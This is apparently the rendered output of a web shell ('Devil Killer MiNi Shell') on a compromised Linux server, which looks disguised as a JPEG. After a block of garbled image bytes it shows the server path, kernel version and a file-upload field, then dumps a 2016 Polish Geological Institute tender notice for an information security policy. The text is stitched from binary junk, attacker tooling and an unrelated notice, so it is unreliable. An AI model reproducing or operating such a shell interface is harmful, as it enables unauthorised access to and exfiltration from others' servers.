JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161027/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161027/331733-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='www.pgi.gov.pl' target='_blank'>www.pgi.gov.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 331733 - 2016
              z dnia 2016-10-27 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Warszawa: Opracowanie Polityki Bezpieczeństwa Informacji 
oraz wsparcie wdrożenia Systemu Zarządzania Bezpieczeństwem Informacji
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Państwowy Instytut Geologiczny - Państwowy Instytut Badawczy, krajowy numer identyfikacyjny
              000332133, ul.
              ul. Rakowiecka 
              4,
              00-975 
              Warszawa, woj.
              mazowieckie, państwo
              Polska, tel.
              22 4592313, e-mail
              , faks
              22 4592023.
              <br />
              Adres strony internetowej (URL): www.pgi.gov.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Instytut badawczy</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.pgi.gov.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.pgi.gov.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Przekazanie oferty do Zamawiającego za pośrednictwem operatora pocztowego, osobiście lub posłańca<br />
                Adres:
                <br />Państwowy Instytut Geologiczny - Państwowy Instytut Badawczy (PIG-PIB), ul. Rakowiecka 4, 00-975 Warszawa, Kancelaria Ogólna (parter budynku A, pok. 1)</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Opracowanie Polityki Bezpieczeństwa Informacji 
oraz wsparcie wdrożenia Systemu Zarządzania Bezpieczeństwem Informacji
<br /><b>Numer referencyjny: </b>EZ-240-58/2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest usługa polegająca na opracowaniu dokumentacji Polityki Bezpieczeństwa Informacji (PBI) oraz wdrożeniu Systemu Zarządzania Bezpieczeństwem Informacji (SZBI) zgodnie z wymaganiami normy PN-ISO/IEC 27001:2014 oraz zaleceniami norm:, PN-ISO/IEC 27005:2014, PN-ISO/IEC 24762:2010 jak również Ustawy o Ochronie Danych Osobowych.
Szczegółowy opis przedmiotu zamówienia został zawarty w załączniku nr 1 do SIWZ  Opis przedmiotu zamówienia, załączniku nr 2 do SIWZ  Istotne Postanowienia Umowy
<br /><br /><b>II.5) Główny kod CPV: </b>79417000-0<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 3<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                7.2.	W zakresie zdolności technicznej lub zawodowej Wykonawca zobowiązany jest wykazać, że:
7.2.1.	w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wykonał co najmniej:
7.2.1.1.	dwie usługi polegające na opracowaniu PBI w jednostkach administracji publicznej, zatrudniających ponad 800 osób, przy czym wartość przynajmniej jednej z tych usług wyniosła minimum 200.000 PLN brutto;
7.2.1.2.	co najmniej jedną usługę doradczą obejmującą:
a)	opracowanie planu ciągłości działania usług IT zawierającego co najmniej: analizę zagrożeń oraz ryzyka dla biznesu wraz z szacowaniem ryzyka związanego z utratą ciągłości działania IT, sposoby testowania scenariuszy odtworzeniowych, procedury zapewnienia ciągłości świadczenia usług IT w sytuacji awaryjnej (min. 25 procedur), procedury powołania i działania zespołu kryzysowego IT oraz mechanizmów komunikacji wewnętrznej w sytuacji krytycznej, a także sposoby testowania scenariuszy odtworzeniowych,
b)	przeprowadzenie testów weryfikujących poprawność przynajmniej 3 procedur odtworzeniowych wchodzących w skład planu ciągłości działania, przy czym wszystkie testy wykazały możliwość realizacji procedur poniżej założonego czasu odtwarzania,
c)	opracowanie następujących procedur bezpieczeństwa dla jednostki administracji publicznej:
	monitorowania bezpieczeństwa systemów i infrastruktury informatycznej, 
	zarządzania incydentami bezpieczeństwa, 
	zarządzania narzędziami chroniącymi przed złośliwym oprogramowaniem,
	zarządzania podatnościami systemów i infrastruktury informatycznej, 
	dotyczących wykorzystywania zabezpieczeń kryptograficznych.
7.2.1.3.	dwie usługi polegające na wsparciu wdrożenia Systemu Zarządzania Bezpieczeństwem Informacji (SZBI) w jednostkach administracji publicznej, przy czym wartość przynajmniej jednej z nich wyniosła minimum  200.000 PLN brutto;
7.2.1.4.	dwie usługi polegające na opracowaniu projektu rozwiązania (wdrożenia) lub modernizacji systemu informatycznego opartego na SZBI na platformie Oracle lub równoważnej, przetwarzającego dane osobowe, przy czym wartość przynajmniej jednej z tych usług wyniosła minimum 200.000 PLN brutto.
Uwaga:
Wykonawca musi wpisać w Wykazie wykonanych usług wartość brutto całego zamówienia (umowy) oraz wskazać wartość konkretnej (wymaganej) usługi..
W przypadku, gdy wartość zamówienia została wyrażona w walucie innej niż PLN, wykonawca zobowiązany jest do jej przeliczenia na PLN przyjmując jako podstawę średni kurs danej waluty opublikowany przez NBP (wg tabeli A kursów średnich walut obcych) w dniu publikacji niniejszego ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.

7.2.2.	Wykonawcach będzie dysponować na etapie wykonywania zamówienia zespołem konsultantów zdolnym do wykonania zamówienia, w skład którego wchodzić będzie co najmniej jeden specjalista przypisany do każdej z ról wymienionych poniżej, a w przypadku punktu7.2.2.1 - co najmniej dwóch specjalistów:

7.2.2.1.	Ekspert ds. systemów bezpieczeństwa
Wymagania: 
a)	wykształcenie wyższe magisterskie z zakresu informatyki, 
b)	posiada minimum 3 letnie doświadczenie w zakresie bezpieczeństwa systemów teleinformatycznych,
c)	znajomość języka polskiego w stopniu komunikatywnym,
d)	posiada doświadczenie w zakresie bezpieczeństwa systemów informatycznych z zakresu prowadzenia audytu bezpieczeństwa informacji CISA lub CISSP poświadczone ważnym certyfikatem jednostek certyfikujących (np. CISSP, CRISC, CLFE), 
e)	posiada znajomość normy ISO/IEC 27001 potwierdzonej certyfikatem ISO/IEC 27001 Audytor Wiodący, ISO 22301 Audytor Wiodący, ISO/IEC 27005 Risk Manager,
f)	w ciągu ostatnich 3 lat przed terminem składania ofert brał udział w roli eksperta ds. bezpieczeństwa w zaprojektowaniu i wdrożeniu systemu zarządzania bezpieczeństwem informacji w instytucji zatrudniającej co najmniej 800 osób,
g)	w ciągu ostatnich 3 lat przed terminem składania ofert brał udział w co najmniej dwóch projektach w roli eksperta ds. bezpieczeństwa systemów informatycznych, przy czym wartość co najmniej jednego projektu wynosiła minimum 200 000,00 PLN brutto.

7.2.2.2.	Ekspert analityk
Wymagania:
a)	wykształcenie wyższe, 
b)	znajomość języka polskiego w stopniu komunikatywnym,
c)	posiada znajomość specyfiki różnych systemów teleinformatycznych, w tym dotyczących przetwarzania informacji przestrzennych,
d)	posiada doświadczenie w opracowaniu modeli danych, modeli procesów oraz modeli funkcjonalnych całego systemu, 
e)	w ciągu ostatnich 5 lat przed terminem składania ofert brał udział w co najmniej dwóch projektach w roli analityka, w zakresie zbierania i specyfikacji wymagań funkcjonalnych i niefunkcjonalnych, przy czym wartość co najmniej jednego projektu wynosiła minimum 200 000,00 PLN brutto,
f)	w ciągu ostatnich 5 lat przed upływem terminu składania ofert brał udział jako architekt lub analityk danych w realizacji co najmniej dwóch projektów, w którym do jego obowiązków należała analiza i modelowanie danych, które miały aspekt przestrzenny. Wartość przynajmniej jednego z tych projektów wyniosła min. 200.000 PLN brutto.

7.2.2.3.	Kierownik projektu 
Wymagania:
a)	posiada wyższe wykształcenie, 
b)	znajomość języka polskiego w stopniu komunikatywnym,
c)	posiada certyfikat z metodyki zarządzania projektami PRINCE2 Practitioner lub równoważnej, udokumentowany certyfikatem wydanym przez uznaną zewnętrzną jednostkę certyfikującą
d)	posiada znajomość zagadnień dot. zarządzania usługami IT potwierdzoną certyfikatem na poziomie ITIL Ekspert,
e)	posiada co najmniej 5-letnie doświadczenie w zakresie bezpieczeństwa IT, w tym co najmniej 3 letnie doświadczenie w realizacji usług spełniających co najmniej wymagania opisane w pkt. 7.2.1.2   oraz brał udział przynajmniej w jednym audycie w obszarze infrastruktury informatycznej i systemów informatycznych w jednostkach administracji publicznej, 
f)	w ciągu ostatnich 3 lat przed upływem terminu składania ofert kierował projektem lub brał udział w co najmniej jednym projekcie dot.  budowy i wdrożenia systemu informatycznego, o wartości projektu lub systemu nie mniejszej, niż 200.000 PLN brutto.
Uwaga: 
W przypadku wymagań dotyczących potencjału kadrowego dopuszczalne jest wystąpienie tej samej osoby maksymalnie dwukrotnie w różnych rolach w ramach jednej oferty/wniosku o dopuszczenie do udziału w postępowaniu.
Zamawiający dopuszcza wykazanie różnych wymaganych doświadczeń eksperta w ramach jednego projektu.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  tak
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">10.3.	W celu wykazania braku podstaw do wykluczenia Wykonawcy z postępowania o udzielenie zamówienia w okolicznościach, o których mowa w art. 24 ust. 5 pkt. 1 ustawy Pzp, Zamawiający żąda następujących dokumentów:
10.3.1.	Informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy Pzp, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert/ wniosku o dopuszczenie do udziału w postępowaniu;
10.3.2.	Zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert/ wniosków o dopuszczenie do udziału w postępowaniu, lub inny dokument potwierdzający, że Wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
10.3.3.	Zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo inny dokument potwierdzający, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert/ wniosku o dopuszczenie do udziału w postępowaniu, lub inny dokument potwierdzający, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
10.3.4.	Odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 5 pkt 1 ustawy Pzp. W tym zakresie zastosowanie ma art. 26 ust. 6 ustawy Pzp  ze względu na możliwość samodzielnego pobrania przez Zamawiającego ww. dokumentu, Wykonawca wskazać w ofercie/wniosków o dopuszczenie do udziału w postępowaniu informacje które umożliwia pobranie takiego dokumentu z odpowiedniego rejestru. Jeżeli wskazane dane będą prawidłowe Zamawiający samodzielnie pobierze oraz wydrukuje taki dokument bez obowiązku dołączenia go przez Wykonawcę do wniosku o dopuszczenie do udziału w postępowaniu.
UWAGA: W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia- dokumenty składa każdy z Wykonawców występujących wspólnie.
10.4.	Z treści załączonych dokumentów musi wynikać jednoznacznie, iż Wykonawca wykazał spełnianie warunków udziału w postępowaniu i braku podstaw do wykluczenia. 
10.5.	Nie wykazanie spełniania chociażby jednego warunku, skutkować będzie wykluczeniem Wykonawcy z postępowania. 
10.6.	Wymogi szczególne w zakresie dokumentów dotyczących innego podmiotu żądane od Wykonawcy:
10.6.1.	W przypadku, gdy Wykonawca polega na zasobach innych podmiotów na zasadach określonych w art. 22a ustawy Pzp, Zamawiający żąda przedstawienia w odniesieniu do innego podmiotu:
10.6.1.1.	Informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy Pzp, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert /wniosków o dopuszczenie do udziału w postępowaniu,
10.6.1.2.	Zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert/ wniosku o dopuszczenie do udziału w postępowaniu, lub inny dokument potwierdzający, że Wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
10.6.1.3.	Zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo inny dokument potwierdzający, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert/ wniosku o dopuszczenie do udziału w postępowaniu, lub inny dokument potwierdzający, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
10.6.1.4.	Odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 5 pkt 1 ustawy Pzp. W tym zakresie zastosowanie ma art. 26 ust. 6 ustawy Pzp;
10.6.2.	Stosownie do zakresu udostępnianych zasobów przez inny podmiot oraz warunków, których spełnianiu one służą, Wykonawca zobowiązany jest złożyć właściwe dokumenty tych podmiotów w celu wykazania spełnienia warunków udziału w postępowaniu przez Wykonawcę.
10.7.	Wymogi szczególne w zakresie dokumentów dotyczących Wykonawców wspólnie ubiegających się o zamówienie:
W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców (konsorcjum), dokumenty wymienione w pkt 10.3 składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Dokumenty wskazane w pkt 10.2 składa ten Wykonawca-członek konsorcjum, który wykazuje spełnienie odpowiedniego warunku udziału w postępowaniu.
10.8.	Dokumenty Wykonawców spoza Rzeczypospolitej Polskiej
10.8.1.	Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentu, o którym mowa w: 
10.8.1.1.	pkt 10.4.1.  składa informację z odpowiedniego rejestru albo, w przypadku braku takiego rejestru, inny równoważny dokument wydany przez właściwy organ sądowy lub administracyjny kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dotyczy informacja albo dokument, w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy Pzp,
10.8.1.2.	pkt 10.3.2  10.3.4  składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
10.8.1.2.1.	nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne albo że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
10.8.1.2.2.	nie otwarto jego likwidacji ani nie ogłoszono upadłości.
